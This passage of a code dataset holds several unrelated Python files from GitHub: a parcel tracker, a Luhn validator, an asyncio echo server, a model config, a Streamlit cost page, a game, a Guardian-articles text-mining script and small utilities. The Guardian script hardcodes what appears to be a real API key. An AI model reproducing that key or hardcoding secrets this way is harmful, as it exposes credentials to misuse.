WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_id(trackingNumID))\n\t\tsubmitButtonElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_xpath(submitXpath))\n\n\t\ttrackingFieldElement.clear()\n\t\ttrackingFieldElement.send_keys(trackingNumber)\n\t\tsubmitButtonElement.click()\n\n\t\tWebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_xpath(progressXpath))\n\telif (carrier == 'USPS'):\n\t\tdriver.get(\"https://tools.usps.com/go/TrackConfirmAction!input.action\")\n\t\ttrackingNumID = \"tLabels\"\n\t\tsubmitXpath = \"//*[@id='trackNumFindBtn']\"\n\t\tprogressXpath = \"//*[@id='results-multi']/div[1]/div/div[3]/div[1]/h3\"\n\n\t\ttrackingFieldElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_id(trackingNumID))\n\t\tsubmitButtonElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_xpath(submitXpath))\n\n\t\ttrackingFieldElement.clear()\n\t\ttrackingFieldElement.send_keys(trackingNumber)\n\t\tsubmitButtonElement.click()\n\nmain()","repo_name":"J2Pi/PackTrack","sub_path":"tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42368923624","text":"\"\"\"\nPython script to check validity of credit card numbers\n\nGenerating check digit:\n\nLets assume you have a number given below:\n3 - 7 - 5 - 6 - 2 - 1 - 9 - 8 - 6 - 7 - X\nX is the check digit.\nNow starting from the right most digit i.e. check digit, double the every second digit.\nNew number will be:\n3 - 14 - 5 - 12 - 2 - 2 - 9 - 16 - 6 - 14 - X\nNow if double of a digit is more then 9, add the digits.\nSo the number will become:\n3 - 5 - 5 - 3 - 2 - 2 - 9 - 7 - 6 - 5 - X\nNow add all digits.\n47 + X\nMultiply the non-check part by 9.\n47 * 9 = 423\nUnit digit in the multiplication result is the check digit. 
X = 3\nValid number would be 37562198673.\n\"\"\"\nimport sys\n\n\ndef usage():\n msg = \"\"\"\n\n usage:\n python3 credit_card_validator credit_card_number\n\n example:\n python3 credit_card_validator 34678253793\n\n \"\"\"\n print(msg)\n\n\ndef get_cc_number():\n if len(sys.argv) < 2:\n usage()\n sys.exit(1)\n\n return sys.argv[1]\n\n\ndef sum_digits(digit):\n if digit < 10:\n return digit\n else:\n sum = (digit % 10) + (digit // 10)\n return sum\n\n\ndef validate(cc_num):\n # reverse the credit card number\n cc_num = cc_num[::-1]\n # convert to integer\n cc_num = [int(x) for x in cc_num]\n # double every second digit\n doubled_second_digit_list = list()\n digits = list(enumerate(cc_num, start=1))\n for index, digit in digits:\n if index % 2 == 0:\n doubled_second_digit_list.append(digit * 2)\n else:\n doubled_second_digit_list.append(digit)\n\n # add the digits if any number is more than 9\n doubled_second_digit_list = [sum_digits(x) for x in doubled_second_digit_list]\n # sum all digits\n sum_of_digits = sum(doubled_second_digit_list)\n if sum_of_digits % 10 == 0:\n return True\n else:\n return False\n\n\nif __name__ == \"__main__\":\n print(validate(get_cc_number()))\n","repo_name":"udhayprakash/Python_for_interview_preparation","sub_path":"Interview_Questions/validating_credit_cards_using_luhns_algorithm.py","file_name":"validating_credit_cards_using_luhns_algorithm.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"35550620891","text":"import asyncio\n\nasync def wr(writer):\n await writer.drain()\n writer.close()\n\nasync def handle(reader,writer):\n data = await reader.read(8096)\n writer.write(data[:8024])\n task = asyncio.ensure_future(wr(writer))\n \n\n\nloop = asyncio.get_event_loop()\ncoro = asyncio.start_server(handle, '127.0.0.1', 8888, loop=loop)\nserver = loop.run_until_complete(coro)\nloop.run_forever()\n\n","repo_name":"Shihab-Shahriar/Little-Projects","sub_path":"asyncio/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36071544778","text":"# model settings\nmodel = dict(\n type='ImageClassifier',\n backbone=dict(type='LeNet5', num_classes=10),\n neck=None,\n head=dict(\n type='ClsHead',\n loss=dict(type='CrossEntropyLoss', loss_weight=1.0),\n ))\n\n# dataset settings\ndataset_type = 'MNIST'\ndata_preprocessor = dict(mean=[33.46], std=[78.87], num_classes=10)\n\npipeline = [dict(type='Resize', scale=32), dict(type='PackInputs')]\n\ncommon_data_cfg = dict(\n type=dataset_type, data_prefix='data/mnist', pipeline=pipeline)\n\ntrain_dataloader = dict(\n batch_size=128,\n num_workers=2,\n dataset=dict(**common_data_cfg, test_mode=False),\n sampler=dict(type='DefaultSampler', shuffle=True),\n)\n\nval_dataloader = dict(\n batch_size=128,\n num_workers=2,\n dataset=dict(**common_data_cfg, test_mode=True),\n sampler=dict(type='DefaultSampler', shuffle=False),\n)\nval_evaluator = dict(type='Accuracy', topk=(1, ))\n\ntest_dataloader = val_dataloader\ntest_evaluator = val_evaluator\n\n# schedule settings\noptim_wrapper = dict(\n optimizer=dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001))\n\nparam_scheduler = dict(\n type='MultiStepLR', # learning policy, decay on several milestones.\n by_epoch=True, # update based on epoch.\n milestones=[15], # decay at the 15th epochs.\n gamma=0.1, # decay to 0.1 times.\n)\n\ntrain_cfg = 
dict(by_epoch=True, max_epochs=5, val_interval=1) # train 5 epochs\nval_cfg = dict()\ntest_cfg = dict()\n\n# runtime settings\ndefault_scope = 'mmpretrain'\n\ndefault_hooks = dict(\n # record the time of every iteration.\n timer=dict(type='IterTimerHook'),\n # print log every 150 iterations.\n logger=dict(type='LoggerHook', interval=150),\n # enable the parameter scheduler.\n param_scheduler=dict(type='ParamSchedulerHook'),\n # save checkpoint per epoch.\n checkpoint=dict(type='CheckpointHook', interval=1),\n # set sampler seed in distributed evrionment.\n sampler_seed=dict(type='DistSamplerSeedHook'),\n)\n\nenv_cfg = dict(\n # disable cudnn benchmark\n cudnn_benchmark=False,\n # set multi process parameters\n mp_cfg=dict(mp_start_method='fork', opencv_num_threads=0),\n # set distributed parameters\n dist_cfg=dict(backend='nccl'),\n)\n\nlog_level = 'INFO'\n\n# load from which checkpoint\nload_from = None\n\n# whether to resume the training of the checkpoint\nresume_from = None\n\n# NOTE: `auto_scale_lr` is for automatically scaling LR\n# based on the actual training batch size.\n# base_batch_size = (1 GPUs) x (128 samples per GPU)\nauto_scale_lr = dict(base_batch_size=128)\n","repo_name":"open-mmlab/mmpretrain","sub_path":"configs/lenet/lenet5_mnist.py","file_name":"lenet5_mnist.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","stars":2849,"dataset":"github-code","pt":"27"} +{"seq_id":"7820021710","text":"import streamlit as st\nimport pandas as pd\n\n# Asumiendo que tus DataFrames ya están cargados en st.session_state\nif 'recetario' in st.session_state:\n # Asignando los DataFrames a variables\n recetario = st.session_state.recetario\n df_conteo = st.session_state.df_conteo\n df_costos = st.session_state.df_costos\n\n # Combinando los DataFrames\n df_combinado = recetario.merge(df_conteo, left_on='Nombre', right_on='Comidas').merge(df_costos, on='Ingrediente')\n\n # Añadiendo la columna de total de personas\n total_personas = st.number_input(\"Introduce el número de personas\", value=1, min_value=1)\n df_combinado['Total Personas'] = total_personas\n\n # Asegurando que las columnas sean del tipo correcto\n df_combinado[['Cantidad por persona', 'Total Personas', 'Costo', 'Veces que se come']] = df_combinado[['Cantidad por persona', 'Total Personas', 'Costo', 'Veces que se come']].astype(float)\n\n # Calculando el costo total por ingrediente\n df_combinado['Costo Total'] = (\n df_combinado['Cantidad por persona'] *\n df_combinado['Total Personas'] *\n df_combinado['Costo'] *\n df_combinado['Veces que se come']\n )\n\n # Mostrando el DataFrame resultante\n # st.dataframe(df_combinado, hide_index= True)\n\n # Calculando y mostrando el costo total, costo por comida, y costo por ingrediente\n costo_total = df_combinado['Costo Total'].sum()\n st.write(f\"Costo Total: ${round(costo_total,2)}\")\n\n costo_por_persona = costo_total / total_personas\n st.write(f\"Costo por persona: ${round(costo_por_persona,2)}\")\n\n costo_por_comida = df_combinado.groupby('Nombre')['Costo Total'].sum()\n st.write(\"Costo por Comida:\", round(costo_por_comida,2))\n\n costo_por_ingrediente = df_combinado.groupby('Ingrediente')['Costo Total'].sum()\n st.write(\"Costo por Ingrediente:\", costo_por_ingrediente)\n\nelse:\n st.error('No hay 
recetas')","repo_name":"lpetralli/stfood","sub_path":"pages/4_Cálculo_costos.py","file_name":"4_Cálculo_costos.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"32604062222","text":"import random\r\nfrom HigherLowerGamedata import data\r\nfrom art import logo, vs\r\n\r\ndef check_ans(guess, follower_count_a, follower_count_b):\r\n if follower_count_a > follower_count_b:\r\n return guess == \"a\"\r\n else:\r\n return guess == \"b\"\r\n\r\ndef game():\r\n start_game = True\r\n score = 0\r\n x = random.randint(0, len(data))\r\n\r\n while start_game:\r\n\r\n name_a = data[x][\"name\"]\r\n country_a = data[x][\"country\"]\r\n description_a = data[x][\"description\"]\r\n follower_count_a = data[x][\"follower_count\"]\r\n print(f\"Compare A: {name_a}, {description_a}, from {country_a}\")\r\n\r\n print(vs)\r\n y = random.randint(0, len(data))\r\n name_b = data[y][\"name\"]\r\n country_b = data[y][\"country\"]\r\n description_b = data[y][\"description\"]\r\n follower_count_b = data[y][\"follower_count\"]\r\n print(f\"Against B: {name_b}, {description_b}, from {country_b}\")\r\n\r\n\r\n user_ans = input(\"Who has more followers? Type 'A' or 'B': \")\r\n\r\n is_correct = check_ans(user_ans, follower_count_a, follower_count_b)\r\n\r\n print(logo)\r\n if is_correct:\r\n score += 1\r\n print(f\"You are right! Your current score is {score}.\")\r\n else:\r\n start_game = False\r\n print(f\"Sorry, that's wrong. Your final score {score}\")\r\n x = y\r\n\r\ngame()","repo_name":"mansipurohit11/100-Days-Python","sub_path":"Higher Lower game/HigherLowerGame.py","file_name":"HigherLowerGame.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"37554719399","text":"import json\r\nimport requests\r\nfrom os import makedirs\r\nfrom os.path import join, exists\r\nfrom datetime import date, timedelta\r\n \r\n# This creates two subdirectories called \"theguardian\" and \"collection\"\r\nARTICLES_DIR = join('theguardian', 'collection')\r\nmakedirs(ARTICLES_DIR, exist_ok=True)\r\n \r\n# Sample URL\r\n# http://content.guardianapis.com/search?from-date=2016-01-02&\r\n# to-date=2016-01-02&order-by=newest&show-fields=all&page-size=200\r\n# &api-key=your-api-key-goes-here\r\n \r\n# Change this for your API key:\r\nMY_API_KEY = 'f820d1dc-b679-45fb-aa15-443d1c44924f'\r\n \r\nAPI_ENDPOINT = 'http://content.guardianapis.com/search'\r\nmy_params = {\r\n 'from-date': \"\", # leave empty, change start_date / end_date variables instead\r\n 'to-date': \"\",\r\n 'order-by': \"newest\",\r\n 'show-fields': 'all',\r\n 'page-size': 200,\r\n 'api-key': MY_API_KEY\r\n}\r\n \r\n# day iteration from here:\r\n# http://stackoverflow.com/questions/7274267/print-all-day-dates-between-two-dates\r\n \r\n# Update these dates to suit your own needs.\r\nstart_date = date(2019, 4, 1)\r\nend_date = date(2019,10, 31)\r\n \r\ndayrange = range((end_date - start_date).days + 1)\r\nfor daycount in dayrange:\r\n dt = start_date + timedelta(days=daycount)\r\n datestr = dt.strftime('%Y-%m-%d')\r\n fname = join(ARTICLES_DIR, datestr + '.json')\r\n if not exists(fname):\r\n # then let's download it\r\n print(\"Downloading\", datestr)\r\n all_results = []\r\n my_params['from-date'] = datestr\r\n my_params['to-date'] = datestr\r\n current_page = 1\r\n total_pages = 1\r\n while current_page <= total_pages:\r\n print(\"...page\", current_page)\r\n 
my_params['page'] = current_page\r\n resp = requests.get(API_ENDPOINT, my_params)\r\n data = resp.json()\r\n all_results.extend(data['response']['results'])\r\n # if there is more than one page\r\n current_page += 1\r\n total_pages = data['response']['pages']\r\n \r\n with open(fname, 'w') as f:\r\n print(\"Writing to\", fname)\r\n \r\n # re-serialize it for pretty indentation\r\n f.write(json.dumps(all_results, indent=2))\r\n\r\n# Assignment 1. The collection\r\n# Import TheGuardian OpenApi\r\n\r\nimport json\r\nimport os\r\nfrom nltk.corpus import stopwords as sw\r\n\r\ndirectory_name = \"theguardian/collection/\"\r\n\r\nids = list()\r\ntexts = list()\r\nsections = list()\r\nfor filename in os.listdir(directory_name):\r\n if filename.endswith(\".json\"):\r\n with open(directory_name + filename) as json_file:\r\n data = json.load(json_file)\r\n for article in data:\r\n id = article['id']\r\n fields = article['fields']\r\n text = fields['bodyText'] if fields['bodyText'] else \"\"\r\n ids.append(id)\r\n texts.append(text)\r\n section = article['sectionId']\t# Id name each article gets by The Guardian\r\n sections.append(section) # Adding each item to a list as above \"sections = list()\"\r\n\r\nprint(\"Number of ids: %d\" % len(ids))\r\nprint(\"Number of texts: %d\" % len(texts))\r\n\r\n# Assignment 2. Pre-process and describe your collection\r\n \r\nsect = set(sections) # Changing the list into a set, meaning that no duplicates of the section titles will appear. It thereby creates a list where each unique name appears only once.\r\n# print(sect) # This could print the whole list of unique categories from the data set.\r\nlen(sect) # Counts the list of categories.\r\n\r\n# Unique count of each of the ID names with the count of each category. Showing each how many articles there are under the ID name\r\nimport numpy as np\r\nunique, counts = np.unique(sections, return_counts=True)\r\ndict(zip(unique, counts)) \r\n\r\n# How many characters there are combined, through all the data.\r\nall_lengths = list()\r\nfor text in texts:\r\n all_lengths.append(len(text))\r\nprint(\"Total sum of characters in dataset: %i\" % sum(all_lengths))\r\n\r\n# When performing a tokenization we can split up the strings and thereby count the total number of words. This method is without any tokenization tools.\r\nword_count = 0\r\nfor text in texts:\r\n words = text.split()\r\n word_count = word_count + len(words)\r\nword_count\r\n\r\n# To get the unique words we do a word split but now also extend the words.\r\nall_words = list()\r\nfor text in texts:\r\n words = text.split()\r\n all_words.extend(words)\r\nunique_words = set(all_words)\r\nunique_word_count = len(unique_words)\r\nprint(\"Unique word count: %i\" % unique_word_count)\r\n\r\n# The average word length is found by first finding all the individual word lengths, and then calculating the average from that.\r\ntotal_word_length = 0\r\nfor word in all_words:\r\n total_word_length = total_word_length + len(word)\r\naverage_word_length = total_word_length / len(all_words)\r\nprint(\"Average word length: %.6f\" % average_word_length)\r\n\r\n# To find out how many sentences there are in total, we first select the end of sentence marker for where a sentence should finish.\r\ndef end_of_sentence_marker(character):\r\n if character in ['.', '?', '!']: # In our case we made '.', '?', '!' our sentence splitters. 
\r\n return True\r\n else: \r\n return False\r\n\r\ndef split_sentences(texts):\r\n sentences = []\r\n start = 0\r\n for end, character in enumerate(text): # The enumerate adds a counter to an iterable and returns it in a form of enumerate object, that then can be used in loops.\r\n if end_of_sentence_marker(character):\r\n sentence = text[start: end + 1]\r\n sentences.append(sentence)\r\n start = end + 1\r\n return sentences\r\n\r\nall_sentences = list()\r\nfor text in texts:\r\n sentences = split_sentences(text)\r\n all_sentences.extend(sentences)\r\nsentence_count = len(all_sentences)\r\nsentence_count\r\n\r\n# The average number of words in a sentence\r\nwords_per_sentence = word_count / sentence_count\r\nprint(\"words per sentence: %.6f\" % words_per_sentence)\r\n\r\n# The following code shows a random sample of the unique words. This is to give an idea of what the words looks like. Here we see that some words are not typical words e.g. numbers ‘£22.99’ or abbreviations like ‘JCRA’ or that the words have punctuation marks around them and therefore appear as a different word than the same word without them: look” vs. look\r\nimport random\r\nrandom.sample(unique_words, 20)\r\n\r\nfrom nltk.tokenize import word_tokenize\r\n\r\n# Word tokenization of the documents and converting of big letters to small ones. \r\ntokens = list()\r\nfor text in texts:\r\n tokens_in_text = word_tokenize(text)\r\n for token in tokens_in_text:\r\n if token.isalpha():\r\n tokens.append(token.lower())\r\n\r\n# Creating a new list from the token list with stopwords removed\r\nstopWords = set(sw.words('english'))\r\n\r\nswwords = list()\r\nfor w in tokens:\r\n if w not in stopWords:\r\n swwords.append(w)\r\n\r\nprint(\"Str.split word count: %i\" % word_count) # Wordcount using str.split\r\nprint(\"Word count: %i\" % len(tokens)) # Wordcount using nltk tokenizer\r\nprint(\"Word count with stopwords removed: %i\" % len(swwords)) # Wordcount with stopwords removed using nltk tokenizer\r\nunique_tokens = set(tokens)\r\nunique_swwords = set(swwords)\r\nprint(\"Str.split unique word count: %i\" % unique_word_count) # Unique wordcount using str.split\r\nprint(\"Unique word count: %i\" % len(unique_tokens)) # Unique wordcount using nltk tokenizer\r\nprint(\"Unique word count with stopwords removed: %i\" % len(unique_swwords)) # Unique wordcount with stopwords removed using nltk tokenizer\r\n\r\nimport random\r\nrandom.sample(unique_swwords, 20)\r\n\r\n# Here we make a subset of the entire dataset. 2 lists are being made to include both the section id´s: “sport” & “football” and the indexes for the original list. \r\nidxes = []\r\nsubtexts = []\r\nfor i, section in enumerate(sections):\r\n if section in ['sport','football']:\r\n idxes.append(i)\r\n subtexts.append(texts[i])\r\nlen(idxes) # Test to see how many files there are under the sections “sport” & “football” respectively. These numbers can be compared to the list of all sections, where the total number of articles per section can be observed. \r\n\r\n# Assignment 3. Select articles using a query\r\n# To create the document-term matrix for the dataset we need to use CountVectorizer, \r\n# which can be imported with sklearn. 
To transform our data we must also use model_vect.fit_transform.\r\n# When running to code, it tells us that there are 2.395.815 elements in our document matrix \r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom nltk.corpus import stopwords as sw\r\nmodel_vect = CountVectorizer(stop_words= stopWords, token_pattern=r'[a-zA-Z\\-][a-zA-Z\\-]{2,}')\r\ndata_vect = model_vect.fit_transform(subtexts)\r\nprint('Shape: (%i, %i)' % data_vect.shape) # This shows how many documents 6808 x how many terms 87615 there are in our subset. We changed the initial dataset from only containing articles from starting on the 1st of September to ending on the 30th of October, to starting on the 1st of April to ending on the 30th of October. We did so because we wanted to show our results on a larger datascale. \r\ndata_vect\r\n\r\n# In this line of code we demonstrate how we're able to find the index placement of the 10 most used\r\n# words in our documents. When using. A1 we're able to present results in an array, which\r\n# can be described as a line of numbers. The [:10] tells that we want it as a top 10. We can change this\r\n# number if we want to show more or fewer results eg. 20 or 5. \r\ncounts = data_vect.sum(axis=0).A1\r\ntop_idxs = (-counts).argsort()[:10]\r\ntop_idxs\r\n\r\n# Here we use inverted_vocabulary to assign the actual words belonging to the top-10 indexes in the sub-sets.\r\ninverted_vocabulary = dict([(idx, word) for word, idx in model_vect.vocabulary_.items()])\r\ntop_words = [inverted_vocabulary[idx] for idx in top_idxs]\r\nprint(\"Top words in subset: %s\" % top_words)\r\n\r\n# Frequency/amount of times the words are being used in the entire dataset. So we can compare it to the most used word in the subsets.\r\nfrom nltk.probability import FreqDist\r\nfdist = FreqDist(swwords)\r\nfdist.most_common(30)\r\n\r\n# This line is not important in itself, but it creates a submatrix that will be used later on.\r\nimport random\r\nsome_row_idxs = random.sample(range(0,len(subtexts)), 10)\r\nprint(\"Selection: (%s x %s)\" % (some_row_idxs, top_idxs))\r\nsub_matrix = data_vect[some_row_idxs, :][:, top_idxs].todense()\r\nsub_matrix\r\n\r\n# The code here transforms the tf-idf model.\r\nfrom sklearn.feature_extraction.text import TfidfTransformer\r\nmodel_tfidf = TfidfTransformer()\r\ndata_tfidf = model_tfidf.fit_transform(data_vect)\r\n\r\n# The freqs function helps us sort the top 10 words.\r\nfreqs = data_tfidf.mean(axis=0).A1\r\ntop_idxs = (-freqs).argsort()[:10].tolist()\r\ntop_words = [inverted_vocabulary[idx] for idx in top_idxs]\r\n(top_idxs, top_words)\r\n\r\n# Now we can use the submatrix and the transformed tf-idf, to create a scheme of the top 10 most used words and their weight in 10 random documents.\r\nimport pandas as pd\r\nsub_matrix = data_tfidf[some_row_idxs, :][:,top_idxs].todense()\r\ndf = pd.DataFrame(columns=top_words, index=some_row_idxs, data=sub_matrix)\r\ndf\r\n\r\n# Query terms that we think we will find in our subsets. \r\nterms = ['tottenham', 'hotspurs', 'hotspur', 'spurs', 'stadium', 'new', 'home']\r\nterms\r\n\r\n# The count of each term in the subsets, how many times it is used. 
\r\nterm_idxs = [model_vect.vocabulary_.get(term) for term in terms]\r\nterm_counts = [counts[idx] for idx in term_idxs]\r\nterm_counts\r\n\r\n# Calculate the term weights \r\nidfs = model_tfidf.idf_\r\nterm_idfs = [idfs[idx] for idx in term_idxs]\r\nterm_idfs\r\n\r\n# Creates a matrix for the query words and their weight in the chosen subsets\r\ndfi = pd.DataFrame(columns=['count', 'idf'], index=terms, data=zip(term_counts,term_idfs))\r\ndfi\r\n\r\n# Assignment 4. Model and visualize the topics in your subset\r\n# 4 components\r\nfrom sklearn.decomposition import LatentDirichletAllocation\r\nmodel_lda = LatentDirichletAllocation(n_components=6, random_state=0)\r\ndata_lda = model_lda.fit_transform(data_vect)\r\nnp.shape(data_lda)\r\n\r\n# Here we show the top 20 words and their individual weight related to each of the 4 components \r\nfor i, term_weights in enumerate(model_lda.components_):\r\n top_idxs = (-term_weights).argsort()[:20]\r\n top_words = [\"%s (%.3f)\" % (model_vect.get_feature_names()[idx], term_weights[idx]) for idx in top_idxs]\r\n print(\"Topic %d: %s\" % (i, \", \".join(top_words)))\r\n \r\n# A small matrix to illustrate which document is the most likely to match one of the topics that was found in the code above. \r\ntopic_names = [\"Topic\" + str(i) for i in range(model_lda.n_components)]\r\ndoc_names = [\"Doc\" + str(i) for i in range(len(subtexts))]\r\ndf = pd.DataFrame(data=np.round(data_lda, 2), columns=topic_names, index=doc_names).head(10)\r\ndf.style.applymap(lambda val: \"background: red\" if val>.3 else '', )\r\n\r\n# In this code we’re able to take a random document and show its index placement, topic vector, which of the 4 components it relates the most to. Lastly we’re shown the entire document text \r\ndoc_idx = random.randint(0,len(subtexts)-1)\r\nprint('Doc idx: %d' % doc_idx)\r\ntopics = data_lda[doc_idx]\r\nprint('Topic vector: %s' % topics)\r\nvote = np.argsort(-topics)[0]\r\nprint('Topic vote: %i' % vote)\r\nsubtexts[doc_idx]\r\n\r\n# Word Cloud\r\nfrom wordcloud import WordCloud\r\nimport matplotlib.pyplot as plt\r\n\r\nfor i, term_weights in enumerate(model_lda.components_):\r\n top_idxs = (-term_weights).argsort()[:20]\r\n top_words = [model_vect.get_feature_names()[idx] for idx in top_idxs]\r\n word_freqs = dict(zip(top_words, term_weights[top_idxs]))\r\n wc = WordCloud(background_color=\"white\",width=200,height=200, max_words=20).generate_from_frequencies(word_freqs)\r\n plt.subplot(2, 3, i+1)\r\n plt.imshow(wc)\r\n\r\n# The following code compares each of the topics from earlier to ALL texts in our subset and shows which document is most connected to each topic. \r\ndf = pd.DataFrame(data=data_lda, columns=topic_names)\r\ndf['class'] = idxes\r\ndf = df.groupby('class').mean().round(2)\r\ndf.style.applymap(lambda val: \"background: red\" if val>.5 else '', )\r\n\r\n# These lines make unique words from our subsets, where stopwords, small letters, and tokenizer are used. This has been done to get plot frequency distribution and Zipf’s law graph. 
\r\nsubtokens = list()\r\nfor subtext in subtexts:\r\n tokens_in_subtext = word_tokenize(subtext)\r\n for subtoken in tokens_in_subtext:\r\n if subtoken.isalpha():\r\n subtokens.append(subtoken.lower())\r\nstopWords = set(sw.words('english'))\r\nsubwords = list()\r\nfor w in subtokens:\r\n if w not in stopWords:\r\n subwords.append(w)\r\n\r\n# Plot frequency distribution\r\nfrom nltk.probability import FreqDist\r\nfdist = FreqDist(subwords)\r\nfdist.most_common(30)\r\nimport matplotlib.pyplot as plt\r\nfdist.plot(30,cumulative=False)\r\nplt.show()\r\n\r\n# Zipf’s law\r\nranks = range(1, len(fdist) + 1)\r\nfreqs = list(fdist.values())\r\nfreqs.sort(reverse = True)\r\nplt.plot(ranks, freqs, '-')\r\nplt.xscale('log')\r\nplt.yscale('log')\r\nplt.show()\r\n\r\n# Here we try to answer our research question: With which topics was the football club Tottenham mentioned? \r\n# We have the previously selected and used terms from assignment 3. First, we combine the 7 query words.\r\nquery = \" \".join(terms)\r\nquery\r\n\r\n# Then changing the query in to a sparse matrix with 1 row. \r\nquery_vect_counts = model_vect.transform([query])\r\nquery_vect = model_tfidf.transform(query_vect_counts)\r\nquery_vect\r\n\r\n# We then compare all terms with our research question, where the percentage shows how well they fit with our query.\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\nsims = cosine_similarity(query_vect, data_tfidf)\r\nsims\r\n\r\n# Here we sort the documents by how well they fit our query. The most likely is at the top.\r\nsims_sorted_idx = (-sims).argsort()\r\nsims_sorted_idx\r\n\r\n# The document that fits our query best is shown here and you get the whole article. The article is: https://www.theguardian.com/football/blog/2019/apr/03/tottenham-new-stadium-spurs-numbers-game-crystal-palace which is about the new stadium that Tottenham hotspurs got in March. \r\nsubtexts[sims_sorted_idx[0,0]]\r\n \r\n# Second query using only “tottenham” and “spurs” to find articles only related to these terms.\r\nTotSputerms = ['tottenham', 'spurs']\r\n\r\n# In these lines we make a vectorizer model of how many times tottenham and spurs are mentioned (frequency), and what their idf is. The two numbers together lets us calculate the weight of the terms. \r\ntotterm_idxs = [model_vect.vocabulary_.get(term) for term in TotSputerms]\r\ntotterm_counts = [counts[idx] for idx in totterm_idxs]\r\nTotidfs = model_tfidf.idf_\r\nTotterm_idfs = [Totidfs[idx] for idx in totterm_idxs]\r\ntotdf = pd.DataFrame(columns=['count', 'idf'], index=TotSputerms, data=zip(totterm_counts,Totterm_idfs))\r\ntotdf\r\n \r\n# We join the terms tottenham and spurs into a string, then we transform them into a model vectorizer. We compare the similarity between the query and each document.\r\ntsquery = \" \".join(TotSputerms)\r\ntsquery_vect_counts = model_vect.transform([tsquery])\r\ntsquery_vect = model_tfidf.transform(tsquery_vect_counts)\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\ntssims = cosine_similarity(tsquery_vect, data_tfidf)\r\ntssims_sorted_idx = (-tssims).argsort()\r\n \r\n# In this section we show the top 5 most related articles to our query. 
\r\nprint(\"First article most fitting query: (%s)\" % (subtexts[tssims_sorted_idx[0,0]]))\r\nprint(\"Second article most fitting query: (%s)\" % (subtexts[tssims_sorted_idx[0,1]]))\r\nprint(\"Third article most fitting query: (%s)\" % (subtexts[tssims_sorted_idx[0,2]]))\r\nprint(\"Fourth article most fitting query: (%s)\" % (subtexts[tssims_sorted_idx[0,3]]))\r\nprint(\"Fifth article most fitting query: (%s)\" % (subtexts[tssims_sorted_idx[0,4]]))\r\n \r\n# Mini matrix showing cosine similarity between articles and the research question. This shows which article is the most likely to have the words from our query to answer the research question.\r\nprint(\"Shape of 2-D array similarity from query: (%i, %i)\" % (len(tssims), len(tssims[0,:])) )\r\ntsdf = pd.DataFrame(data=zip(tssims_sorted_idx[0,:], tssims[0,tssims_sorted_idx[0,:]]), columns=[\"Article Id\", \"Similarity in %\"])\r\ntsdf[0:10]\r\n","repo_name":"BA-ODS2019/PHM536","sub_path":"Portfolio 2 - eksamen.py","file_name":"Portfolio 2 - eksamen.py","file_ext":"py","file_size_in_byte":18279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"74165490311","text":"import functions as f\nimport info as i\n\ntry: # Extract the quiz code from the most recently downloaded file (soon to be only PDF captured) and then copied to clipboard (Linux only) \n recentPdf = f.findRecentFile(\".pdf\") #finds most recently modified file in current directory\n code = f.getCode(recentPdf)\n f.copyToClipboard(code, recentPdf)\nfinally:\n f.waitForTexFile(i.name, i.idNum)\n f.confirmChanges()","repo_name":"dnerever/latexQuizScript","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"31251172560","text":"import os\nimport re\n\nroute_n_result = os.popen('netstat -r').read()\n\nipv4_get = re.findall('(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})\\s+((UG)?)',route_n_result)[0]\n\nif ipv4_get:\n print('网关为:'+ipv4_get[0])\nelse:\n print('信息获取失败')","repo_name":"chenhu0818/chenhu","sub_path":"day_5_1.py","file_name":"day_5_1.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"1214562516","text":"import itertools\nimport pydub\nfrom pydub import AudioSegment\nfrom pydub.utils import db_to_float\nimport csv\nimport control\n\n\ndef detect_silence(audio_segment, min_silence_len, silence_thresh, seek_step):\n seg_len = len(audio_segment)\n\n # you can't have a silent portion of a sound that is longer than the sound\n if seg_len < min_silence_len:\n return []\n\n # convert silence threshold to a float value (so we can compare it to rms)\n silence_thresh = db_to_float(silence_thresh) * \\\n audio_segment.max_possible_amplitude\n print(\"silence_thresh: \", silence_thresh)\n\n # find silence and add start and end indicies to the to_cut list\n silence_starts = []\n\n # check successive (1 sec by default) chunk of sound for silence\n # try a chunk at every \"seek step\" (or every chunk for a seek step == 1)\n last_slice_start = seg_len - min_silence_len\n slice_starts = range(0, last_slice_start + 1, seek_step)\n\n # guarantee last_slice_start is included in the range\n # to make sure the last portion of the audio is seached\n if last_slice_start % seek_step:\n slice_starts = itertools.chain(slice_starts, [last_slice_start])\n\n for i in slice_starts:\n audio_slice = 
